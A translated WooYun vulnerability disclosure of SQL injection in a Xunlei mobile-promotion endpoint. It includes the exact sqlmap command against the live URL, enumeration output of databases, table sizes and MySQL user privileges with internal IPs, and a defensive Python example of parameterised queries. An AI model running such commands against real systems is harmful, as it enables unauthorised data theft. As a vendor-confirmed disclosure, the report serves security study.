
Vulnerability summary

Defect ID: wooyun-2016-0193838

Title: More than two SQL injections on a Xunlei site \ error-based \ UNION query \ contains business information and user data \ Zhihu data surprisingly present \ DBA privileges

Affected vendor: Xunlei

Author: hear7v

Submitted: 2016-04-08 14:16

Fixed: 2016-05-23 15:20

Disclosed: 2016-05-23 15:20

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-04-08: Details sent to the vendor; awaiting vendor response
2016-04-08: Vendor confirmed; details disclosed to the vendor only
2016-04-18: Details disclosed to core white hats and relevant domain experts
2016-04-28: Details disclosed to regular white hats
2016-05-08: Details disclosed to intern white hats
2016-05-23: Details disclosed to the public

Brief description:

More than two injection points on a Xunlei site, error-based and UNION-based; single tables hold tens of millions of rows and the total volume is very large, including business information and user data; Zhihu data is surprisingly present.

Detailed description:

python sqlmap.py -u "http://interface.k.xunlei.com/mobile_promote/manage/self_gets?operator=no_limit&user_type=100&version=2.0.2.16&province=no_limit&system_type=2?chanel&umeng-10900010&client_type=android-swjsq-2.0.2.16&peerid=EC1D7F9DADB8004V&time_and=1460018261265&client_version=androidswjsq-2.0.2.16&os=android-5.1.22ZTEQ519T" --user-agent "Dalvik/2.1.0 (Linux; U; Android 5.1; ZTE Q519T Build/LMY47D)"

Proof of vulnerability:

Database: stat
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| speep_vip2_uids | 9537056 |
| t_user_vas_20151119 | 8380318 |
| action_data | 1872421 |
| gift_o | 1612178 |
| speed_stat_by_min | 1530678 |
| formal_speed_uid_history | 1395435 |
| gift | 1004079 |
| vip_history | 975731 |
| uid2kn | 847758 |
| speed_stat_by_min_bac | 643706 |
| portal_stat_by_min | 612048 |
| t_user_vas | 445839 |
| zhifu_history | 405635 |
| speep_uids | 312878 |
| query_client_version_stat_daily | 252835 |
| speed_stat_by_min_tem | 55570 |
| zhifu_stat | 43920 |
| analyse_province_speed | 39165 |
| tem_kuainiao_user_state | 33355 |
| analyse_speed_proxy_status | 23210 |
| xl7_stat_daily | 19824 |
| analyse_feedback_codeinfo | 16912 |
| plugin_conversion_stat | 16749 |
| analyse_client_speed | 9429 |
| user_ana | 9360 |
| query_province_stat_daily | 7966 |
| pc_user_version_count_pid | 6682 |
| zhifu_stat_bac_1122 | 4685 |
| zhifu_history_1117 | 4141 |
| analyse_operator_speed | 4017 |
| user_count_daily | 3882 |
| zhifu_history_20151120 | 3291 |
| user_ana_bac | 3159 |
| query_client_stat_daily | 2347 |
| stat | 1895 |
| sys_user_pms | 1822 |
| speed_time_stat_daily | 1795 |
| analyse_speed | 1119 |
| query_operator_stat_daily | 987 |
| sys_log | 856 |
| speed_ok_identity_stat | 779 |
| zhifu_stat_desc | 768 |
| zhifu_history_batch | 649 |
| zhifu_open_cycle_stat | 644 |
| pc_user_count_pid | 290 |
| android_user_count_pid | 282 |
| ios_user_count_pid | 282 |
| plugin_speed_stat | 252 |
| query_all_stat_daily | 251 |
| zhifu_open_cycle_client_stat | 161 |
| data_user_event_day_login | 157 |
| member_count_stat | 80 |
| sys_menu | 77 |
| client_jiaoji | 63 |
| xl7_stat_id2property | 63 |
| action_type | 51 |
| sys_user_upwd_log | 50 |
| sys_user | 41 |
| dial_repeat_count_sum | 31 |
| dial_repeat_count_sum_bac | 31 |
| uid_repeat_count_sum | 31 |
| member_reserved_stat | 30 |
| plugin | 22 |
| ci_sessions | 14 |
| zhifu_client | 12 |
| client_type | 9 |
| setup_consumers | 8 |
| performance_timers | 5 |
| setup_timers | 1 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 1029 |
| help_topic | 508 |
| help_keyword | 465 |
| help_category | 38 |
| `user` | 8 |
| db | 4 |
| proxies_priv | 2 |
+---------------------------------------+---------+
Database: global
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| pc_promote_uid_14 | 130000 |
| mobile_promote | 23 |
| pc_promote | 10 |
+---------------------------------------+---------+
Database: interface
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| bind_record | 1 |
+---------------------------------------+---------+
Database: query_log
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| query_log_6_0_1 | 15787880 |
| query_log_6_0_5 | 15659917 |
| query_log_6_0_4 | 15549772 |
| query_log_6_0_6 | 15073810 |
| query_log_6_0_3 | 14976535 |
| query_log_6_0_7 | 14927479 |
| query_log_6_0_2 | 14919142 |
| query_log_8_0_1 | 13164756 |
| query_log_8_0_5 | 13140388 |
| query_log_8_0_4 | 13030371 |
| query_log_6_0_8 | 12887105 |
| query_log_6_0_9 | 12879007 |
| query_log_8_0_3 | 12654790 |
| query_log_8_0_2 | 12542332 |
| query_log_8_0_6 | 12505141 |
| query_log_8_0_7 | 12246204 |
| query_log_8_0_9 | 10856725 |
| query_log_8_0_8 | 10752162 |
| query_log_6_0_0 | 10297248 |
| query_log_6_1_1 | 10054511 |
| query_log_6_1_5 | 9998411 |
| query_log_6_1_4 | 9949178 |
| query_log_5_0_1 | 9931374 |
| query_log_6_1_2 | 9920209 |
| query_log_6_1_6 | 9776956 |
| query_log_6_1_7 | 9716618 |
| query_log_5_0_4 | 9263860 |
| query_log_5_0_5 | 9212598 |
| query_log_5_0_2 | 8976801 |
| query_log_5_0_3 | 8972922 |
| query_log_5_0_6 | 8662356 |
| query_log_6_1_3 | 8551096 |
| query_log_5_0_7 | 8548397 |
| query_log_8_0_0 | 8492903 |
| query_log_6_1_8 | 8321503 |
| query_log_6_1_9 | 8309844 |
| query_log_8_1_2 | 8121264 |
| query_log_8_1_3 | 8119303 |
| query_log_8_1_1 | 8048653 |
| query_log_8_1_5 | 8046545 |
| query_log_8_1_4 | 7990767 |
| query_log_8_1_6 | 7899025 |
| query_log_5_0_9 | 7871072 |
| query_log_8_1_7 | 7699257 |
| query_log_5_0_8 | 7484770 |
| query_log_7_0_1 | 7232183 |
| query_log_7_0_3 | 7197931 |
| query_log_7_0_2 | 7188413 |
| query_log_7_0_6 | 7122009 |
| query_log_7_0_5 | 7057586 |
| query_log_7_0_4 | 7007013 |
| query_log_6_1_0 | 6891653 |
| query_log_7_0_7 | 6878064 |
| query_log_8_1_9 | 6692157 |
| query_log_8_1_8 | 6675937 |
| query_log_5_0_0 | 6259222 |
| query_log_7_0_9 | 5927197 |
| query_log_7_0_8 | 5911811 |
| query_log_5_1_1 | 5866282 |
| query_log_5_1_2 | 5599932 |
| query_log_5_1_3 | 5548525 |
| query_log_8_1_0 | 5535330 |
| query_log_5_1_4 | 5456733 |
| query_log_5_1_5 | 5447971 |
| query_log_5_1_6 | 5285942 |
| query_log_5_1_7 | 5194566 |
| query_log_7_1_2 | 5035024 |
| query_log_7_0_0 | 5017385 |
| query_log_7_1_3 | 4979573 |
| query_log_7_1_1 | 4941787 |
| query_log_7_1_6 | 4828147 |
| query_log_7_1_5 | 4820992 |
| query_log_7_1_4 | 4785544 |
| query_log_5_1_9 | 4716656 |
| query_log_7_1_7 | 4697270 |
| query_log_5_1_8 | 4460258 |
| query_log_7_1_9 | 4072142 |
| query_log_7_1_8 | 4047269 |
| query_log_5_1_0 | 3989968 |
| query_log_7_1_0 | 3495220 |
| query_log_1_1_1 | 2063681 |
| query_log_1_1_3 | 1814603 |
| query_log_1_1_5 | 1807892 |
| query_log_1_1_4 | 1804971 |
| query_log_1_1_2 | 1804780 |
| query_log_1_1_6 | 1788879 |
| query_log_1_1_7 | 1763480 |
| query_log_1_0_4 | 220031 |
| query_log_1_0_7 | 217451 |
| query_log_0_0_4 | 214727 |
| query_log_0_0_1 | 212659 |
| query_log_0_0_2 | 212013 |
| query_log_0_0_5 | 211494 |
| query_log_0_1_3 | 207579 |
| query_log_0_0_6 | 206062 |
| query_log_1_0_2 | 205414 |
| query_log_0_1_2 | 204220 |
| query_log_0_1_1 | 200441 |
| query_log_0_0_7 | 196351 |
| query_log_0_1_5 | 194458 |
| query_log_0_1_4 | 190959 |
| query_log_0_1_6 | 189722 |
| query_log_1_0_3 | 187603 |
| query_log_0_0_9 | 175362 |
| query_log_0_1_7 | 174263 |
| query_log_0_0_8 | 173752 |
| query_log_1_0_8 | 169640 |
| query_log_0_1_9 | 162532 |
| query_log_0_1_8 | 162062 |
| query_log_1_0_9 | 160289 |
| query_log_0_1_0 | 138533 |
| query_log_0_0_0 | 138078 |
| query_log_1_0_0 | 129620 |
| query_log_9_1_2 | 122008 |
| query_log_9_1_3 | 118684 |
| query_log_9_1_6 | 112011 |
| query_log_9_1_4 | 110003 |
| query_log_9_1_5 | 109181 |
| query_log_9_0_2 | 106242 |
| query_log_9_1_7 | 105667 |
| query_log_9_0_3 | 105029 |
| query_log_9_0_4 | 98779 |
| query_log_9_0_5 | 97967 |
| query_log_9_0_6 | 97258 |
| query_log_9_1_1 | 92556 |
| query_log_9_1_9 | 91470 |
| query_log_9_0_7 | 91244 |
| query_log_9_1_8 | 90170 |
| query_log_9_0_1 | 87259 |
| query_log_9_0_9 | 81944 |
| query_log_9_0_8 | 80688 |
| query_log_9_1_0 | 77087 |
| query_log_9_0_0 | 64291 |
| query_log_2_1_2 | 45687 |
| query_log_2_1_3 | 45613 |
| query_log_2_1_6 | 44156 |
| query_log_2_1_4 | 43996 |
| query_log_2_1_7 | 43580 |
| query_log_2_1_1 | 43233 |
| query_log_2_1_8 | 37270 |
| query_log_2_1_9 | 36839 |
| query_log_2_1_5 | 36600 |
| query_log_4_1_2 | 33372 |
| query_log_4_1_4 | 33129 |
| query_log_4_1_5 | 33041 |
| query_log_4_1_6 | 32879 |
| query_log_4_1_7 | 32644 |
| query_log_4_1_1 | 32613 |
| query_log_2_1_0 | 31347 |
| query_log_4_1_3 | 29328 |
| query_log_4_1_8 | 27084 |
| query_log_4_1_9 | 26897 |
| query_log_4_1_0 | 23161 |
| query_log_2_0_2 | 10909 |
| query_log_2_0_6 | 10681 |
| query_log_2_0_3 | 10551 |
| query_log_2_0_4 | 10442 |
| query_log_2_0_1 | 10151 |
| query_log_2_0_5 | 10118 |
| query_log_2_0_7 | 9564 |
| query_log_2_0_8 | 8599 |
| query_log_2_0_9 | 8540 |
| query_log_4_0_3 | 7831 |
| query_log_4_0_4 | 7580 |
| query_log_4_0_6 | 7565 |
| query_log_4_0_5 | 7227 |
| query_log_4_0_2 | 7009 |
| query_log_2_0_0 | 6832 |
| query_log_4_0_1 | 6590 |
| query_log_4_0_7 | 6491 |
| query_log_4_0_8 | 5711 |
| query_log_4_0_9 | 5542 |
| query_log_4_0_0 | 4384 |
| query_log_10_0_7 | 509 |
| query_log_10_1_7 | 287 |
| query_log_3_0_1 | 210 |
| query_log_3_0_6 | 182 |
| query_log_3_0_2 | 151 |
| query_log_3_0_5 | 144 |
| query_log_3_0_7 | 140 |
| query_log_3_0_4 | 135 |
| query_log_3_1_1 | 124 |
| query_log_3_0_3 | 123 |
| query_log_3_1_6 | 120 |
| query_log_3_1_2 | 96 |
| query_log_3_1_7 | 94 |
| query_log_3_1_4 | 89 |
| query_log_3_1_3 | 85 |
| query_log_3_1_5 | 85 |
| query_log_3_0_9 | 30 |
| query_log_11_1_7 | 24 |
| query_log_3_1_9 | 24 |
| query_log_3_0_8 | 20 |
| query_log_3_1_8 | 20 |
| query_log_3_1_0 | 15 |
| query_log_3_0_0 | 12 |
| query_log_11_0_7 | 11 |
+---------------------------------------+---------+
Database: access_log
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| access_log_20160404 | 7697159 |
| access_log_20160406 | 7336387 |
| access_log_20160407 | 7305092 |
| access_log_20160405 | 7259207 |
| access_log_20160331 | 5748378 |
| access_log_20160313 | 5042542 |
| access_log_20160320 | 4978698 |
| access_log_20160319 | 4927949 |
| access_log_20160312 | 4920366 |
| access_log_20160310 | 4158324 |
| access_log_20160328 | 4158209 |
| access_log_20160329 | 4157389 |
| access_log_20160227 | 4070947 |
| access_log_20160309 | 4053648 |
| access_log_20160308 | 4025162 |
| access_log_20160221 | 3944884 |
| access_log_20160304 | 3776862 |
| access_log_20160307 | 3741766 |
| access_log_20160303 | 3686839 |
| access_log_20160302 | 3669029 |
| access_log_20160226 | 3660205 |
| access_log_20160301 | 3656808 |
| access_log_20160225 | 3601496 |
| access_log_20160220 | 3595823 |
| access_log_20160229 | 3585032 |
| access_log_20160223 | 3579818 |
| access_log_20160224 | 3576439 |
| access_log_20160222 | 3549159 |
+---------------------------------------+---------+
Database: test
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| proxy_speed_log_20150926 | 522294 |
| proxy_speed_log_20150919 | 495252 |
| proxy_speed_log_20150920 | 478269 |
| proxy_speed_log_20150925 | 465590 |
| proxy_speed_log_20150913 | 435380 |
| proxy_speed_log_20150918 | 434254 |
| proxy_speed_log_20150912 | 433320 |
| proxy_speed_log_20150924 | 424070 |
| proxy_speed_log_20150921 | 418395 |
| proxy_speed_log_20150923 | 416164 |
| proxy_speed_log_20150922 | 407650 |
| proxy_speed_log_20150914 | 393216 |
| proxy_speed_log_20150911 | 387210 |
| proxy_speed_log_20150917 | 363995 |
| proxy_speed_log_20150915 | 355420 |
| proxy_speed_log_20150916 | 350006 |
+---------------------------------------+---------+
Database: tips
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| tips_uid_54 | 130000 |
| tips_pid_36 | 96494 |
| tips_pid_38 | 96494 |
| tips_pid_32 | 50000 |
| tips_pid_34 | 46492 |
| tips | 29 |
| tips_pid_22 | 4 |
| tips_pid_26 | 4 |
| tips_pid_28 | 4 |
| tips_pid_30 | 4 |
| tips_pid_18 | 3 |
| tips_pid_24 | 3 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 2474 |
| STATISTICS | 582 |
| TABLES | 441 |
| SESSION_VARIABLES | 326 |
| GLOBAL_VARIABLES | 315 |
| GLOBAL_STATUS | 287 |
| SESSION_STATUS | 287 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197 |
| COLLATIONS | 197 |
| KEY_COLUMN_USAGE | 129 |
| USER_PRIVILEGES | 92 |
| TABLE_CONSTRAINTS | 83 |
| PROCESSLIST | 63 |
| CHARACTER_SETS | 39 |
| PLUGINS | 17 |
| SCHEMA_PRIVILEGES | 16 |
| SCHEMATA | 10 |
| ENGINES | 6 |
| INNODB_CMP | 5 |
| INNODB_CMP_RESET | 5 |
| INNODB_CMPMEM | 5 |
| INNODB_CMPMEM_RESET | 5 |
| INNODB_TRX | 1 |
+---------------------------------------+---------+
database management system users privileges:
[*] 'nagios'@'127.0.0.1' (administrator) [2]:
privilege: REPLICATION CLIENT
privilege: SUPER
[*] 'root'@'111.161.24.187' [1]:
privilege: USAGE
[*] 'root'@'123.150.185.187' [1]:
privilege: USAGE
[*] 'root'@'127.0.0.1' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'::1' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'localhost' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'slave'@'111.161.24.187' [2]:
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
[*] 'slave'@'123.150.185.187' [2]:
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE

Remediation:

Filter the input; this one has no filtering at all. I hear gifts are being given out.
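To make "filter the input" concrete, the following is an added example, not code from the report or from Xunlei. It places the pattern the report describes (request parameters pasted into SQL text, so that a tampered `system_type` value changes the query's meaning) beside a hardened handler that validates each parameter's type and binds the values with placeholders. The table name `mobile_promote` and the parameter names `operator`, `province`, `system_type` and `user_type` are taken from the report; the column layout, the sample rows, the use of sqlite3 in place of MySQL and the tampered value are all constructed for this demo.

```python
import re
import sqlite3


def make_db():
    """Constructed sample data. Table name and parameter names are from the
    report; columns and rows are assumptions for this demo."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE mobile_promote (
            id INTEGER PRIMARY KEY, operator TEXT, province TEXT,
            system_type INTEGER, user_type INTEGER, title TEXT);
        INSERT INTO mobile_promote VALUES (1, 'no_limit', 'no_limit', 2, 100, 'promo A');
        INSERT INTO mobile_promote VALUES (2, 'no_limit', 'no_limit', 2, 200, 'promo B');
        INSERT INTO mobile_promote VALUES (3, 'cmcc', 'guangdong', 1, 100, 'promo C');
    """)
    return conn


def self_gets_vulnerable(conn, operator, province, system_type, user_type):
    """The pattern the report describes: request values become part of the SQL
    text, so a value such as '2 OR 1=1' rewrites the WHERE clause."""
    sql = ("SELECT title FROM mobile_promote WHERE operator='%s' AND province='%s' "
           "AND system_type=%s AND user_type=%s ORDER BY id"
           % (operator, province, system_type, user_type))
    return [row[0] for row in conn.execute(sql)]


# Allow-list for the two free-text parameters: short identifiers only.
TOKEN = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def self_gets_hardened(conn, operator, province, system_type, user_type):
    """Validate types first, then bind with '?' placeholders so the values are
    sent as data and can never be interpreted as SQL."""
    if not (TOKEN.match(operator) and TOKEN.match(province)):
        raise ValueError("operator/province must be short identifiers")
    try:
        system_type = int(system_type)
        user_type = int(user_type)
    except ValueError:
        raise ValueError("system_type/user_type must be integers") from None
    sql = ("SELECT title FROM mobile_promote WHERE operator=? AND province=? "
           "AND system_type=? AND user_type=? ORDER BY id")
    params = (operator, province, system_type, user_type)
    return [row[0] for row in conn.execute(sql, params)]


def demo():
    """Run both handlers on a legitimate request and on a tampered one."""
    conn = make_db()
    legit = dict(operator="no_limit", province="no_limit",
                 system_type="2", user_type="100")
    # Constructed tautology for the demo; not a value from the report.
    tampered = dict(legit, system_type="2 OR 1=1")
    results = {
        "vulnerable_legit": self_gets_vulnerable(conn, **legit),
        "vulnerable_tampered": self_gets_vulnerable(conn, **tampered),
        "hardened_legit": self_gets_hardened(conn, **legit),
    }
    try:
        self_gets_hardened(conn, **tampered)
        results["hardened_rejected"] = False
    except ValueError:
        results["hardened_rejected"] = True
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

With the tampered value, the vulnerable handler returns all three rows because `system_type=2 OR 1=1 AND user_type=100` no longer means what the developer wrote, while the hardened handler rejects the request before any SQL is built; the same legitimate request returns one row from both. Separately, the proof above enumerates `mysql`, `information_schema` and every application schema through the injection, which is what the report's "DBA privileges" finding refers to: a dedicated database account holding only the SELECT rights the endpoint needs would have bounded what a single injected query could reach.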

Copyright notice: when republishing, please credit the source hear7v@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2016-04-08 15:16

Vendor reply:

Thank you for your report; staff have been assigned to handle it.

Latest status:

None yet


Vulnerability comments:

  1. 2016-04-08 16:40 | hear7v ( Regular white hat | Rank:136 Vulnerabilities:21 | Looking for a team to take me in )

    One more point and I'd be a regular "white cat".